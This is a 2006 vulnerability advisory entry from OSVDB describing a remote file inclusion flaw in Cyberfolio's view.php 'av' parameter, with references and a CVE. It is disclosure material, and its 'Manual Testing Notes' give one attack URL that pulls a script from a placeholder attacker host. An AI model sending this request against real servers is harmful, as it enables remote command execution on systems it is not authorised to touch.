Cyberfolio view.php av Variable Remote File Inclusion

2006-11-06T10:33:49
ID OSVDB:30211
Type osvdb
Reporter Dedi Dwianto(the_day@echo.or.id)
Modified 2006-11-06T10:33:49

Description

Vulnerability Description

Cyberfolio contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to view.php not properly sanitizing user input supplied to the 'av' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Cyberfolio contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to view.php not properly sanitizing user input supplied to the 'av' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/cyberfolio/portfolio/msg/view.php?av=http://[attacker]/inject.txt?

References:

Vendor URL: http://www.cyberfolio.org/ Security Tracker: 1017175 Secunia Advisory ID:22721 Related OSVDB ID: 30212 Other Advisory URL: http://advisories.echo.or.id/adv/adv58-theday-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0075.html Keyword: ECHO_ADV_58$2006 ISS X-Force ID: 30033 Generic Exploit URL: http://www.milw0rm.com/exploits/2725 FrSIRT Advisory: ADV-2006-4360 CVE-2006-5768 Bugtraq ID: 20928